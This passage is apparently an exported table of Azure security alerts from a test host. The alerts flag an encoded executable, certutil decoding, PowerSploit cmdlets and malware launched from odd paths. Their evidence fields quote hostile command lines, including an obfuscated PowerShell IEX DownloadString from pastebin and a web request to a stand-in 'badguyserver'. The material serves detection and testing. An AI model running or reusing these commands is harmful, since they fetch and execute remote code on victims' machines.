""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
81,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:11,2019-01-15 05:15:11,290559aa-a3d0-425b-8ed2-e98ccc9f0aa0,2518547714885867955_290559aa-a3d0-425b-8ed2-e98ccc9f0aa0,Detection,Microsoft,Detected encoded executable in command line data,Detected encoded executable in command line data,Detected encoded executable in command line data,"Analysis of host data on MSTICALERTSWIN1 detected a base-64 encoded executable. This has previously been associated with attackers attempting to construct executables on-the-fly through a sequence of commands, and attempting to evade intrusion detection systems by ensuring that no individual command would trigger an alert. This could be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c \""echo tvqqaamaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> delme.b64\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xbb4"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xbb4"",
""CommandLine"": ""cmd /c \""echo tvqqaamaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> delme.b64\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:11.4132044Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:11.4132044Z"",
""EndTimeUtc"": ""2019-01-15T05:15:11.4132044Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
82,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:12,2019-01-15 05:15:12,df1b9eb2-05c4-4f7c-8540-cbb18ec5c608,2518547714873290756_df1b9eb2-05c4-4f7c-8540-cbb18ec5c608,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-reversednslookup.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1514"",
""Suspicious Script"": "".\\powershell Invoke-ReverseDnsLookup.ps1"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1514"",
""CommandLine"": "".\\powershell invoke-reversednslookup.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:12.6709243Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:12.6709243Z"",
""EndTimeUtc"": ""2019-01-15T05:15:12.6709243Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
83,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:11,2019-01-15 05:15:11,9d6d471a-c94f-4706-b0ff-b2f0301495aa,2518547714880519889_9d6d471a-c94f-4706-b0ff-b2f0301495aa,Detection,Microsoft,Detected suspicious credentials in commandline,Detected suspicious credentials in commandline,Detected suspicious credentials in commandline,Analysis of host data on MSTICALERTSWIN1 detected a suspicious password being used to execute a file by activity group BORON. This activity group has been known to use this password to execute Pirpi malware on a victim host.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\implant.exe"",
""Suspicious Command Line"": ""implant.exe k111"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x240"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: BORON\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-BORON.pdf?sv=2018-03-28&sr=b&sig=g3MzIgC1xqZm0vvWa6nQxMYoSh1FN513idawGZj2NPY%3D&spr=https&st=2019-01-15T05:00:15Z&se=2019-04-15T05:15:15Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=40dcc8bf-0478-4f3b-b275-ed0a94f2c013\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""implant.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x240"",
""CommandLine"": ""implant.exe k111"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:11.948011Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:11.948011Z"",
""EndTimeUtc"": ""2019-01-15T05:15:11.948011Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
84,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:11,2019-01-15 05:15:11,5c56421d-d894-4437-9b9a-a3b5c6b7e1df,2518547714882331861_5c56421d-d894-4437-9b9a-a3b5c6b7e1df,Detection,Microsoft,Detected decoding of an executable using built-in certutil.exe tool,Detected decoding of an executable using built-in certutil.exe tool,Detected decoding of an executable using built-in certutil.exe tool,"Analysis of host data on MSTICALERTSWIN1 detected that certutil.exe, a built-in administrator utility, was being used to decode an executable instead of its mainstream purpose that relates to manipulating certificates and certificate data. Attackers are known to abuse functionality of legitimate administrator tools to perform malicious actions, for example using a tool such as certutil.exe to decode a malicious executable that will then be subsequently executed.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\certutil.exe"",
""Suspicious Command Line"": ""certutil -decode delme.b64 implant.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xa08"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""certutil.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xa08"",
""CommandLine"": ""certutil -decode delme.b64 implant.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:11.7668138Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:11.7668138Z"",
""EndTimeUtc"": ""2019-01-15T05:15:11.7668138Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
85,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:12,2019-01-15 05:15:12,3eb0eb4b-0536-430c-8ab6-cd48524c14b1,2518547714874872692_3eb0eb4b-0536-430c-8ab6-cd48524c14b1,Detection,Microsoft,Suspicious powershell cmdlets executed,Suspicious powershell cmdlets executed,Suspicious powershell cmdlets executed,Analysis of host data indicates execution of known malicious powershell PowerSploit cmdlets.,Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-shellcode.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x14e0"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x14e0"",
""CommandLine"": "".\\powershell invoke-shellcode.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:12.5127307Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:12.5127307Z"",
""EndTimeUtc"": ""2019-01-15T05:15:12.5127307Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
86,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:12,2019-01-15 05:15:12,953def48-a24b-42a9-bd02-7221be90f84a,2518547714876077067_953def48-a24b-42a9-bd02-7221be90f84a,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x14ac"",
""Suspicious Script"": "".\\powershell -Noninteractive -Noprofile -Command \""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"""",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x14ac"",
""CommandLine"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:12.3922932Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:12.3922932Z"",
""EndTimeUtc"": ""2019-01-15T05:15:12.3922932Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
87,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:13,2019-01-15 05:15:13,76336679-bddf-460f-90fb-35a1386de7a6,2518547714867787710_76336679-bddf-460f-90fb-35a1386de7a6,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x15e8"",
""Suspicious Script"": "".\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'Em17','pqCw')));}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x15e8"",
""CommandLine"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:13.2212289Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:13.2212289Z"",
""EndTimeUtc"": ""2019-01-15T05:15:13.2212289Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:16,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
88,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:14,2019-01-15 05:15:14,f4324711-aeae-4912-a634-331b7e7456b6,2518547714857061520_f4324711-aeae-4912-a634-331b7e7456b6,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\windows\\fonts\\csrss.exe"",
""Suspicious Command Line"": ""c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x178c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x178c"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:14.2938479Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:14.2938479Z"",
""EndTimeUtc"": ""2019-01-15T05:15:14.2938479Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
89,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:17,2019-01-15 05:15:17,9984a237-2dd7-4932-bb8d-23ca535a6254,2518547714829244584_9984a237-2dd7-4932-bb8d-23ca535a6254,Detection,Microsoft,Random process name detected,Random process name detected,Random process name detected,Suspiciously constructed process name detected: c:\diagnostics\usertmp\sdopfjiowtbkjfnbeioruj.exe,Informational,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\sdopfjiowtbkjfnbeioruj.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\sdopfjiowtbkjfnbeioruj.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1564"",
""ModelScore"": ""-21.83"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
